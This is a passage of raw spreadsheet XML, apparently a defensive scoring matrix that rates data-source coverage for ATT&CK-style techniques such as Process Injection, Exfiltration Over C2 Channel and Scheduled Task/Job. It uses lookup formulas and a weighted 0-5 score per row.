        <v>5</v>
      </c>
      <c r="G34" s="32">
        <f t="shared" si="0"/>
        <v>4.2</v>
      </c>
    </row>
    <row r="35" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A35" s="43" t="s">
        <v>100</v>
      </c>
      <c r="B35" s="41" t="str">
        <f>LOOKUP(A35,'REF-DataSources'!A:B)</f>
        <v>Path Interception</v>
      </c>
      <c r="C35" s="45" t="s">
        <v>743</v>
      </c>
      <c r="D35" s="14">
        <v>3</v>
      </c>
      <c r="E35" s="14">
        <v>4</v>
      </c>
      <c r="F35" s="14">
        <v>5</v>
      </c>
      <c r="G35" s="32">
        <f t="shared" si="0"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="36" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A36" s="43" t="s">
        <v>101</v>
      </c>
      <c r="B36" s="41" t="str">
        <f>LOOKUP(A36,'REF-DataSources'!A:B)</f>
        <v>Path Interception</v>
      </c>
      <c r="C36" s="45" t="s">
        <v>631</v>
      </c>
      <c r="D36" s="14">
        <v>3</v>
      </c>
      <c r="E36" s="14">
        <v>4</v>
      </c>
      <c r="F36" s="14">
        <v>5</v>
      </c>
      <c r="G36" s="32">
        <f t="shared" si="0"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="37" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A37" s="43" t="s">
        <v>102</v>
      </c>
      <c r="B37" s="41" t="str">
        <f>LOOKUP(A37,'REF-DataSources'!A:B)</f>
        <v>Masquerading</v>
      </c>
      <c r="C37" s="45" t="s">
        <v>754</v>
      </c>
      <c r="D37" s="14">
        <v>2</v>
      </c>
      <c r="E37" s="14">
        <v>3</v>
      </c>
      <c r="F37" s="14">
        <v>5</v>
      </c>
      <c r="G37" s="32">
        <f t="shared" si="0"/>
        <v>3</v>
      </c>
    </row>
    <row r="38" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A38" s="43" t="s">
        <v>103</v>
      </c>
      <c r="B38" s="41" t="str">
        <f>LOOKUP(A38,'REF-DataSources'!A:B)</f>
        <v>Boot or Logon Initialization Scripts</v>
      </c>
      <c r="C38" s="45" t="s">
        <v>743</v>
      </c>
      <c r="D38" s="14">
        <v>3</v>
      </c>
      <c r="E38" s="14">
        <v>4</v>
      </c>
      <c r="F38" s="14">
        <v>5</v>
      </c>
      <c r="G38" s="32">
        <f t="shared" si="0"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="39" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A39" s="43" t="s">
        <v>105</v>
      </c>
      <c r="B39" s="41" t="str">
        <f>LOOKUP(A39,'REF-DataSources'!A:B)</f>
        <v>Startup Items</v>
      </c>
      <c r="C39" s="45" t="s">
        <v>3035</v>
      </c>
      <c r="D39" s="14">
        <v>2</v>
      </c>
      <c r="E39" s="14">
        <v>4</v>
      </c>
      <c r="F39" s="14">
        <v>4</v>
      </c>
      <c r="G39" s="32">
        <f t="shared" si="0"/>
        <v>3.2</v>
      </c>
    </row>
    <row r="40" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A40" s="43" t="s">
        <v>106</v>
      </c>
      <c r="B40" s="41" t="str">
        <f>LOOKUP(A40,'REF-DataSources'!A:B)</f>
        <v>Data from Network Shared Drive</v>
      </c>
      <c r="C40" s="45" t="s">
        <v>598</v>
      </c>
      <c r="D40" s="14">
        <v>2</v>
      </c>
      <c r="E40" s="14">
        <v>4</v>
      </c>
      <c r="F40" s="14">
        <v>5</v>
      </c>
      <c r="G40" s="32">
        <f t="shared" si="0"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="41" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A41" s="43" t="s">
        <v>108</v>
      </c>
      <c r="B41" s="41" t="str">
        <f>LOOKUP(A41,'REF-DataSources'!A:B)</f>
        <v>Network Sniffing</v>
      </c>
      <c r="C41" s="45" t="s">
        <v>809</v>
      </c>
      <c r="D41" s="14">
        <v>2</v>
      </c>
      <c r="E41" s="14">
        <v>3</v>
      </c>
      <c r="F41" s="14">
        <v>4</v>
      </c>
      <c r="G41" s="32">
        <f t="shared" si="0"/>
        <v>2.8</v>
      </c>
    </row>
    <row r="42" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A42" s="43" t="s">
        <v>110</v>
      </c>
      <c r="B42" s="41" t="str">
        <f>LOOKUP(A42,'REF-DataSources'!A:B)</f>
        <v>Exfiltration Over C2 Channel</v>
      </c>
      <c r="C42" s="45" t="s">
        <v>622</v>
      </c>
      <c r="D42" s="14">
        <v>2</v>
      </c>
      <c r="E42" s="14">
        <v>3</v>
      </c>
      <c r="F42" s="14">
        <v>4</v>
      </c>
      <c r="G42" s="32">
        <f t="shared" si="0"/>
        <v>2.8</v>
      </c>
    </row>
    <row r="43" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A43" s="43" t="s">
        <v>112</v>
      </c>
      <c r="B43" s="41" t="str">
        <f>LOOKUP(A43,'REF-DataSources'!A:B)</f>
        <v>Exfiltration Over C2 Channel</v>
      </c>
      <c r="C43" s="45" t="s">
        <v>631</v>
      </c>
      <c r="D43" s="14">
        <v>1</v>
      </c>
      <c r="E43" s="14">
        <v>3</v>
      </c>
      <c r="F43" s="14">
        <v>4</v>
      </c>
      <c r="G43" s="32">
        <f t="shared" si="0"/>
        <v>2.4</v>
      </c>
    </row>
    <row r="44" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A44" s="43" t="s">
        <v>113</v>
      </c>
      <c r="B44" s="41" t="str">
        <f>LOOKUP(A44,'REF-DataSources'!A:B)</f>
        <v>Commonly Used Port</v>
      </c>
      <c r="C44" s="45" t="s">
        <v>737</v>
      </c>
      <c r="D44" s="14">
        <v>1</v>
      </c>
      <c r="E44" s="14">
        <v>3</v>
      </c>
      <c r="F44" s="14">
        <v>4</v>
      </c>
      <c r="G44" s="32">
        <f t="shared" si="0"/>
        <v>2.4</v>
      </c>
    </row>
    <row r="45" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A45" s="43" t="s">
        <v>115</v>
      </c>
      <c r="B45" s="41" t="str">
        <f>LOOKUP(A45,'REF-DataSources'!A:B)</f>
        <v>Commonly Used Port</v>
      </c>
      <c r="C45" s="45" t="s">
        <v>3036</v>
      </c>
      <c r="D45" s="14">
        <v>2</v>
      </c>
      <c r="E45" s="14">
        <v>3</v>
      </c>
      <c r="F45" s="14">
        <v>4</v>
      </c>
      <c r="G45" s="32">
        <f t="shared" si="0"/>
        <v>2.8</v>
      </c>
    </row>
    <row r="46" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A46" s="43" t="s">
        <v>116</v>
      </c>
      <c r="B46" s="41" t="str">
        <f>LOOKUP(A46,'REF-DataSources'!A:B)</f>
        <v>Commonly Used Port</v>
      </c>
      <c r="C46" s="45" t="s">
        <v>713</v>
      </c>
      <c r="D46" s="14">
        <v>0</v>
      </c>
      <c r="E46" s="14">
        <v>1</v>
      </c>
      <c r="F46" s="14">
        <v>4</v>
      </c>
      <c r="G46" s="32">
        <f t="shared" si="0"/>
        <v>1.2</v>
      </c>
    </row>
    <row r="47" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A47" s="43" t="s">
        <v>117</v>
      </c>
      <c r="B47" s="41" t="str">
        <f>LOOKUP(A47,'REF-DataSources'!A:B)</f>
        <v>Network Service Scanning</v>
      </c>
      <c r="C47" s="45" t="s">
        <v>819</v>
      </c>
      <c r="D47" s="14">
        <v>2</v>
      </c>
      <c r="E47" s="14">
        <v>3</v>
      </c>
      <c r="F47" s="14">
        <v>4</v>
      </c>
      <c r="G47" s="32">
        <f t="shared" si="0"/>
        <v>2.8</v>
      </c>
    </row>
    <row r="48" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A48" s="43" t="s">
        <v>118</v>
      </c>
      <c r="B48" s="41" t="str">
        <f>LOOKUP(A48,'REF-DataSources'!A:B)</f>
        <v>Windows Management Instrumentation</v>
      </c>
      <c r="C48" s="45" t="s">
        <v>824</v>
      </c>
      <c r="D48" s="14">
        <v>2</v>
      </c>
      <c r="E48" s="14">
        <v>4</v>
      </c>
      <c r="F48" s="14">
        <v>4</v>
      </c>
      <c r="G48" s="32">
        <f t="shared" si="0"/>
        <v>3.2</v>
      </c>
    </row>
    <row r="49" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A49" s="43" t="s">
        <v>119</v>
      </c>
      <c r="B49" s="41" t="str">
        <f>LOOKUP(A49,'REF-DataSources'!A:B)</f>
        <v>Exfiltration Over Alternative Protocol</v>
      </c>
      <c r="C49" s="45" t="s">
        <v>3037</v>
      </c>
      <c r="D49" s="14">
        <v>1</v>
      </c>
      <c r="E49" s="14">
        <v>3</v>
      </c>
      <c r="F49" s="14">
        <v>4</v>
      </c>
      <c r="G49" s="32">
        <f t="shared" si="0"/>
        <v>2.4</v>
      </c>
    </row>
    <row r="50" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A50" s="43" t="s">
        <v>121</v>
      </c>
      <c r="B50" s="41" t="str">
        <f>LOOKUP(A50,'REF-DataSources'!A:B)</f>
        <v>System Network Connections Discovery</v>
      </c>
      <c r="C50" s="45" t="s">
        <v>609</v>
      </c>
      <c r="D50" s="14">
        <v>3</v>
      </c>
      <c r="E50" s="14">
        <v>4</v>
      </c>
      <c r="F50" s="14">
        <v>5</v>
      </c>
      <c r="G50" s="32">
        <f t="shared" si="0"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="51" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A51" s="43" t="s">
        <v>123</v>
      </c>
      <c r="B51" s="41" t="str">
        <f>LOOKUP(A51,'REF-DataSources'!A:B)</f>
        <v>System Network Connections Discovery</v>
      </c>
      <c r="C51" s="45" t="s">
        <v>768</v>
      </c>
      <c r="D51" s="14">
        <v>4</v>
      </c>
      <c r="E51" s="14">
        <v>4</v>
      </c>
      <c r="F51" s="14">
        <v>5</v>
      </c>
      <c r="G51" s="32">
        <f t="shared" si="0"/>
        <v>4.2</v>
      </c>
    </row>
    <row r="52" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A52" s="43" t="s">
        <v>124</v>
      </c>
      <c r="B52" s="41" t="str">
        <f>LOOKUP(A52,'REF-DataSources'!A:B)</f>
        <v>Shared Webroot</v>
      </c>
      <c r="C52" s="45" t="s">
        <v>743</v>
      </c>
      <c r="D52" s="14">
        <v>2</v>
      </c>
      <c r="E52" s="14">
        <v>3</v>
      </c>
      <c r="F52" s="14">
        <v>4</v>
      </c>
      <c r="G52" s="32">
        <f t="shared" si="0"/>
        <v>2.8</v>
      </c>
    </row>
    <row r="53" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A53" s="43" t="s">
        <v>125</v>
      </c>
      <c r="B53" s="41" t="str">
        <f>LOOKUP(A53,'REF-DataSources'!A:B)</f>
        <v>Exfiltration Over Physical Medium</v>
      </c>
      <c r="C53" s="45" t="s">
        <v>3038</v>
      </c>
      <c r="D53" s="14">
        <v>2</v>
      </c>
      <c r="E53" s="14">
        <v>3</v>
      </c>
      <c r="F53" s="14">
        <v>3</v>
      </c>
      <c r="G53" s="32">
        <f t="shared" si="0"/>
        <v>2.6</v>
      </c>
    </row>
    <row r="54" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A54" s="43" t="s">
        <v>127</v>
      </c>
      <c r="B54" s="41" t="str">
        <f>LOOKUP(A54,'REF-DataSources'!A:B)</f>
        <v>Scheduled Task/Job</v>
      </c>
      <c r="C54" s="45" t="s">
        <v>859</v>
      </c>
      <c r="D54" s="14">
        <v>3</v>
      </c>
      <c r="E54" s="14">
        <v>4</v>
      </c>
      <c r="F54" s="14">
        <v>5</v>
      </c>
      <c r="G54" s="32">
        <f t="shared" si="0"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="55" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A55" s="43" t="s">
        <v>129</v>
      </c>
      <c r="B55" s="41" t="str">
        <f>LOOKUP(A55,'REF-DataSources'!A:B)</f>
        <v>Systemd Timers</v>
      </c>
      <c r="C55" s="45" t="s">
        <v>3039</v>
      </c>
      <c r="D55" s="14">
        <v>2</v>
      </c>
      <c r="E55" s="14">
        <v>3</v>
      </c>
      <c r="F55" s="14">
        <v>4</v>
      </c>
      <c r="G55" s="32">
        <f t="shared" si="0"/>
        <v>2.8</v>
      </c>
    </row>
    <row r="56" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A56" s="43" t="s">
        <v>131</v>
      </c>
      <c r="B56" s="41" t="str">
        <f>LOOKUP(A56,'REF-DataSources'!A:B)</f>
        <v>Process Injection</v>
      </c>
      <c r="C56" s="45" t="s">
        <v>3040</v>
      </c>
      <c r="D56" s="14">
        <v>3</v>
      </c>
      <c r="E56" s="14">
        <v>4</v>
      </c>
      <c r="F56" s="14">
        <v>5</v>
      </c>
      <c r="G56" s="32">
        <f t="shared" si="0"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="57" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A57" s="43" t="s">
        <v>133</v>
      </c>
      <c r="B57" s="41" t="str">
        <f>LOOKUP(A57,'REF-DataSources'!A:B)</f>
        <v>Input Capture</v>
      </c>
      <c r="C57" s="45" t="s">
        <v>3041</v>
      </c>
      <c r="D57" s="14">
        <v>1</v>
      </c>
      <c r="E57" s="14">
        <v>3</v>
      </c>
      <c r="F57" s="14">
        <v>4</v>
      </c>
      <c r="G57" s="32">
        <f t="shared" si="0"/>
        <v>2.4</v>
      </c>
    </row>
    <row r="58" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A58" s="43" t="s">
        <v>135</v>
      </c>
      <c r="B58" s="41" t="str">
        <f>LOOKUP(A58,'REF-DataSources'!A:B)</f>
        <v>Process Discovery</v>
      </c>
      <c r="C58" s="45" t="s">
        <v>609</v>
      </c>
      <c r="D58" s="14">
        <v>4</v>
      </c>
      <c r="E58" s="14">
        <v>4</v>
      </c>
      <c r="F58" s="14">
        <v>5</v>
      </c>
      <c r="G58" s="32">
        <f t="shared" si="0"/>
        <v>4.2</v>
      </c>
    </row>
    <row r="59" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A59" s="43" t="s">
        <v>136</v>
      </c>
      <c r="B59" s="41" t="str">
        <f>LOOKUP(A59,'REF-DataSources'!A:B)</f>
        <v>Process Discovery</v>
      </c>
      <c r="C59" s="45" t="s">
        <v>3042</v>
      </c>
      <c r="D59" s="14">
        <v>2</v>
      </c>
      <c r="E59" s="14">
        <v>3</v>
      </c>
      <c r="F59" s="14">
        <v>4</v>
      </c>
      <c r="G59" s="32">
        <f t="shared" si="0"/>
        <v>2.8</v>
      </c>
    </row>
    <row r="60" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A60" s="43" t="s">
        <v>138</v>
      </c>
      <c r="B60" s="41" t="str">
        <f>LOOKUP(A60,'REF-DataSources'!A:B)</f>
        <v>Command and Scripting Interpreter</v>
      </c>
      <c r="C60" s="45" t="s">
        <v>609</v>
      </c>
      <c r="D60" s="14">
        <v>2</v>
      </c>
      <c r="E60" s="14">
        <v>4</v>
      </c>
      <c r="F60" s="14">
        <v>5</v>
      </c>
      <c r="G60" s="32">
        <f t="shared" si="0"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="61" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A61" s="43" t="s">
        <v>139</v>
      </c>
      <c r="B61" s="41" t="str">
        <f>LOOKUP(A61,'REF-DataSources'!A:B)</f>
        <v>Network Device CLI</v>
      </c>
      <c r="C61" s="45" t="s">
        <v>2014</v>
      </c>
      <c r="D61" s="14">
        <v>3</v>
      </c>
      <c r="E61" s="14">
        <v>4</v>
      </c>
      <c r="F61" s="14">
        <v>5</v>
      </c>
      <c r="G61" s="32">
        <f t="shared" si="0"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="62" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A62" s="43" t="s">
        <v>141</v>
      </c>
      <c r="B62" s="41" t="str">
        <f>LOOKUP(A62,'REF-DataSources'!A:B)</f>
        <v>Graphical User Interface</v>
      </c>
      <c r="C62" s="45" t="s">
        <v>763</v>
      </c>
      <c r="D62" s="14">
        <v>1</v>
      </c>
      <c r="E62" s="14">
        <v>3</v>
      </c>
      <c r="F62" s="14">
        <v>5</v>
      </c>
      <c r="G62" s="32">
        <f t="shared" si="0"/>
        <v>2.6</v>
      </c>
    </row>
    <row r="63" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A63" s="43" t="s">
        <v>142</v>
      </c>
      <c r="B63" s="41" t="str">
        <f>LOOKUP(A63,'REF-DataSources'!A:B)</f>
        <v>Hypervisor</v>
      </c>
      <c r="C63" s="45" t="s">
        <v>1018</v>
      </c>
      <c r="D63" s="14">
        <v>0</v>
      </c>
      <c r="E63" s="14">
        <v>1</v>
      </c>
      <c r="F63" s="14">
        <v>2</v>
      </c>
      <c r="G63" s="32">
        <f t="shared" si="0"/>
        <v>0.8</v>
      </c>
    </row>
    <row r="64" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A64" s="43" t="s">
        <v>143</v>
      </c>
      <c r="B64" s="41" t="str">
        <f>LOOKUP(A64,'REF-DataSources'!A:B)</f>
        <v>Hypervisor</v>
      </c>
      <c r="C64" s="45" t="s">
        <v>598</v>
      </c>
      <c r="D64" s="14">
        <v>3</v>
      </c>
      <c r="E64" s="14">
        <v>4</v>
      </c>
      <c r="F64" s="14">
        <v>4</v>
      </c>
      <c r="G64" s="32">
        <f t="shared" si="0"/>
        <v>3.6</v>
      </c>
    </row>
    <row r="65" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A65" s="43" t="s">
        <v>145</v>
      </c>
      <c r="B65" s="41" t="str">
        <f>LOOKUP(A65,'REF-DataSources'!A:B)</f>
        <v>Scripting</v>
      </c>
      <c r="C65" s="45" t="s">
        <v>1023</v>
      </c>
      <c r="D65" s="14">
        <v>2</v>
      </c>
      <c r="E65" s="14">
        <v>3</v>
      </c>
      <c r="F65" s="14">
        <v>4</v>
      </c>
      <c r="G65" s="32">
        <f t="shared" si="0"/>
        <v>2.8</v>
      </c>
    </row>
    <row r="66" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A66" s="43" t="s">
        <v>147</v>
      </c>
      <c r="B66" s="41" t="str">
        <f>LOOKUP(A66,'REF-DataSources'!A:B)</f>
        <v>Scripting</v>
      </c>
      <c r="C66" s="45" t="s">
        <v>733</v>
      </c>
      <c r="D66" s="14">
        <v>3</v>
      </c>
      <c r="E66" s="14">
        <v>4</v>
      </c>
      <c r="F66" s="14">
        <v>5</v>
      </c>
      <c r="G66" s="32">
        <f t="shared" si="0"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="67" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A67" s="43" t="s">
        <v>148</v>
      </c>
      <c r="B67" s="41" t="str">
        <f>LOOKUP(A67,'REF-DataSources'!A:B)</f>
        <v>Scripting</v>
      </c>
      <c r="C67" s="45" t="s">
        <v>3043</v>
      </c>
      <c r="D67" s="14">
        <v>3</v>
      </c>
      <c r="E67" s="14">
        <v>4</v>
      </c>
      <c r="F67" s="14">
        <v>4</v>
      </c>
      <c r="G67" s="32">
        <f t="shared" ref="G67:G130" si="1">((D67*2)+(E67*2)+F67)/5</f>
        <v>3.6</v>
      </c>
    </row>
    <row r="68" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A68" s="43" t="s">
        <v>149</v>
      </c>
      <c r="B68" s="41" t="str">
        <f>LOOKUP(A68,'REF-DataSources'!A:B)</f>
        <v>Scripting</v>
      </c>
      <c r="C68" s="45" t="s">
        <v>3044</v>
      </c>
      <c r="D68" s="14">
        <v>0</v>
      </c>
      <c r="E68" s="14">
        <v>0</v>
      </c>
      <c r="F68" s="14">
        <v>3</v>
      </c>
      <c r="G68" s="32">
        <f t="shared" si="1"/>
        <v>0.6</v>
      </c>
    </row>
    <row r="69" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A69" s="43" t="s">
        <v>151</v>
      </c>
      <c r="B69" s="41" t="str">
        <f>LOOKUP(A69,'REF-DataSources'!A:B)</f>
        <v>Exploitation for Privilege Escalation</v>
      </c>
      <c r="C69" s="45" t="s">
        <v>1029</v>
      </c>
      <c r="D69" s="14">
        <v>1</v>
      </c>
      <c r="E69" s="14">
        <v>3</v>
      </c>
      <c r="F69" s="14">
        <v>4</v>
      </c>
      <c r="G69" s="32">
        <f t="shared" si="1"/>
        <v>2.4</v>
      </c>
    </row>
    <row r="70" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A70" s="43" t="s">
        <v>153</v>
      </c>
      <c r="B70" s="41" t="str">
        <f>LOOKUP(A70,'REF-DataSources'!A:B)</f>
        <v>Permission Groups Discovery</v>
      </c>
      <c r="C70" s="45" t="s">
        <v>1159</v>
      </c>
      <c r="D70" s="14">
        <v>3</v>
      </c>
      <c r="E70" s="14">
        <v>4</v>
      </c>
      <c r="F70" s="14">
        <v>5</v>
      </c>
      <c r="G70" s="32">
        <f t="shared" si="1"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="71" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A71" s="43" t="s">
        <v>154</v>
      </c>
      <c r="B71" s="41" t="str">
        <f>LOOKUP(A71,'REF-DataSources'!A:B)</f>
        <v>Indicator Removal on Host</v>
      </c>
      <c r="C71" s="45" t="s">
        <v>1050</v>
      </c>
      <c r="D71" s="14">
        <v>2</v>
      </c>
      <c r="E71" s="14">
        <v>4</v>
      </c>
      <c r="F71" s="14">
        <v>5</v>
      </c>
      <c r="G71" s="32">
        <f t="shared" si="1"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="72" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A72" s="43" t="s">
        <v>155</v>
      </c>
      <c r="B72" s="41" t="str">
        <f>LOOKUP(A72,'REF-DataSources'!A:B)</f>
        <v>Application Layer Protocol</v>
      </c>
      <c r="C72" s="45" t="s">
        <v>697</v>
      </c>
      <c r="D72" s="14">
        <v>1</v>
      </c>
      <c r="E72" s="14">
        <v>3</v>
      </c>
      <c r="F72" s="14">
        <v>4</v>
      </c>
      <c r="G72" s="32">
        <f t="shared" si="1"/>
        <v>2.4</v>
      </c>
    </row>
    <row r="73" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A73" s="43" t="s">
        <v>157</v>
      </c>
      <c r="B73" s="41" t="str">
        <f>LOOKUP(A73,'REF-DataSources'!A:B)</f>
        <v>Software Deployment Tools</v>
      </c>
      <c r="C73" s="45" t="s">
        <v>3045</v>
      </c>
      <c r="D73" s="14">
        <v>2</v>
      </c>
      <c r="E73" s="14">
        <v>3</v>
      </c>
      <c r="F73" s="14">
        <v>4</v>
      </c>
      <c r="G73" s="32">
        <f t="shared" si="1"/>
        <v>2.8</v>
      </c>
    </row>
    <row r="74" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A74" s="43" t="s">
        <v>159</v>
      </c>
      <c r="B74" s="41" t="str">
        <f>LOOKUP(A74,'REF-DataSources'!A:B)</f>
        <v>Software Deployment Tools</v>
      </c>
      <c r="C74" s="45" t="s">
        <v>3046</v>
      </c>
      <c r="D74" s="14">
        <v>2</v>
      </c>
      <c r="E74" s="14">
        <v>4</v>
      </c>
      <c r="F74" s="14">
        <v>5</v>
      </c>
      <c r="G74" s="32">
        <f t="shared" si="1"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="75" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A75" s="43" t="s">
        <v>160</v>
      </c>
      <c r="B75" s="41" t="str">
        <f>LOOKUP(A75,'REF-DataSources'!A:B)</f>
        <v>Data Staged</v>
      </c>
      <c r="C75" s="45" t="s">
        <v>598</v>
      </c>
      <c r="D75" s="14">
        <v>1</v>
      </c>
      <c r="E75" s="14">
        <v>3</v>
      </c>
      <c r="F75" s="14">
        <v>4</v>
      </c>
      <c r="G75" s="32">
        <f t="shared" si="1"/>
        <v>2.4</v>
      </c>
    </row>
    <row r="76" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A76" s="43" t="s">
        <v>161</v>
      </c>
      <c r="B76" s="41" t="str">
        <f>LOOKUP(A76,'REF-DataSources'!A:B)</f>
        <v>Remote Data Staging</v>
      </c>
      <c r="C76" s="45" t="s">
        <v>1139</v>
      </c>
      <c r="D76" s="14">
        <v>4</v>
      </c>
      <c r="E76" s="14">
        <v>4</v>
      </c>
      <c r="F76" s="14">
        <v>4</v>
      </c>
      <c r="G76" s="32">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
    </row>
    <row r="77" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A77" s="43" t="s">
        <v>162</v>
      </c>
      <c r="B77" s="41" t="str">
        <f>LOOKUP(A77,'REF-DataSources'!A:B)</f>
        <v>Remote Data Staging</v>
      </c>
      <c r="C77" s="45" t="s">
        <v>3047</v>
      </c>
      <c r="D77" s="14">
        <v>3</v>
      </c>
      <c r="E77" s="14">
        <v>5</v>
      </c>
      <c r="F77" s="14">
        <v>5</v>
      </c>
      <c r="G77" s="32">
        <f t="shared" si="1"/>
        <v>4.2</v>
      </c>
    </row>
    <row r="78" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A78" s="43" t="s">
        <v>163</v>
      </c>
      <c r="B78" s="41" t="str">
        <f>LOOKUP(A78,'REF-DataSources'!A:B)</f>
        <v>Remote Data Staging</v>
      </c>
      <c r="C78" s="45" t="s">
        <v>3048</v>
      </c>
      <c r="D78" s="14">
        <v>3</v>
      </c>
      <c r="E78" s="14">
        <v>5</v>
      </c>
      <c r="F78" s="14">
        <v>5</v>
      </c>
      <c r="G78" s="32">
        <f t="shared" si="1"/>
        <v>4.2</v>
      </c>
    </row>
    <row r="79" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A79" s="43" t="s">
        <v>165</v>
      </c>
      <c r="B79" s="41" t="str">
        <f>LOOKUP(A79,'REF-DataSources'!A:B)</f>
        <v>Valid Accounts</v>
      </c>
      <c r="C79" s="45" t="s">
        <v>1121</v>
      </c>
      <c r="D79" s="14">
        <v>2</v>
      </c>
      <c r="E79" s="14">
        <v>4</v>
      </c>
      <c r="F79" s="14">
        <v>5</v>
      </c>
      <c r="G79" s="32">
        <f t="shared" si="1"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="80" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A80" s="43" t="s">
        <v>167</v>
      </c>
      <c r="B80" s="41" t="str">
        <f>LOOKUP(A80,'REF-DataSources'!A:B)</f>
        <v>Cloud Accounts</v>
      </c>
      <c r="C80" s="45" t="s">
        <v>3049</v>
      </c>
      <c r="D80" s="14">
        <v>0</v>
      </c>
      <c r="E80" s="14">
        <v>2</v>
      </c>
      <c r="F80" s="14">
        <v>3</v>
      </c>
      <c r="G80" s="32">
        <f t="shared" si="1"/>
        <v>1.4</v>
      </c>
    </row>
    <row r="81" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A81" s="43" t="s">
        <v>169</v>
      </c>
      <c r="B81" s="41" t="str">
        <f>LOOKUP(A81,'REF-DataSources'!A:B)</f>
        <v>Taint Shared Content</v>
      </c>
      <c r="C81" s="45" t="s">
        <v>743</v>
      </c>
      <c r="D81" s="14">
        <v>0</v>
      </c>
      <c r="E81" s="14">
        <v>3</v>
      </c>
      <c r="F81" s="14">
        <v>5</v>
      </c>
      <c r="G81" s="32">
        <f t="shared" si="1"/>
        <v>2.2000000000000002</v>
      </c>
    </row>
    <row r="82" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A82" s="43" t="s">
        <v>170</v>
      </c>
      <c r="B82" s="41" t="str">
        <f>LOOKUP(A82,'REF-DataSources'!A:B)</f>
        <v>Taint Shared Content</v>
      </c>
      <c r="C82" s="45" t="s">
        <v>2085</v>
      </c>
      <c r="D82" s="14">
        <v>2</v>
      </c>
      <c r="E82" s="14">
        <v>3</v>
      </c>
      <c r="F82" s="14">
        <v>5</v>
      </c>
      <c r="G82" s="32">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
    </row>
    <row r="83" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A83" s="43" t="s">
        <v>171</v>
      </c>
      <c r="B83" s="41" t="str">
        <f>LOOKUP(A83,'REF-DataSources'!A:B)</f>
        <v>System Information Discovery</v>
      </c>
      <c r="C83" s="45" t="s">
        <v>1152</v>
      </c>
      <c r="D83" s="14">
        <v>3</v>
      </c>
      <c r="E83" s="14">
        <v>4</v>
      </c>
      <c r="F83" s="14">
        <v>4</v>
      </c>
      <c r="G83" s="32">
        <f t="shared" si="1"/>
        <v>3.6</v>
      </c>
    </row>
    <row r="84" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A84" s="43" t="s">
        <v>172</v>
      </c>
      <c r="B84" s="41" t="str">
        <f>LOOKUP(A84,'REF-DataSources'!A:B)</f>
        <v>File and Directory Discovery</v>
      </c>
      <c r="C84" s="45" t="s">
        <v>598</v>
      </c>
      <c r="D84" s="14">
        <v>1</v>
      </c>
      <c r="E84" s="14">
        <v>3</v>
      </c>
      <c r="F84" s="14">
        <v>4</v>
      </c>
      <c r="G84" s="32">
        <f t="shared" si="1"/>
        <v>2.4</v>
      </c>
    </row>
    <row r="85" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A85" s="43" t="s">
        <v>173</v>
      </c>
      <c r="B85" s="41" t="str">
        <f>LOOKUP(A85,'REF-DataSources'!A:B)</f>
        <v>File and Directory Discovery</v>
      </c>
      <c r="C85" s="45" t="s">
        <v>3024</v>
      </c>
      <c r="D85" s="14">
        <v>3</v>
      </c>
      <c r="E85" s="14">
        <v>4</v>
      </c>
      <c r="F85" s="14">
        <v>5</v>
      </c>
      <c r="G85" s="32">
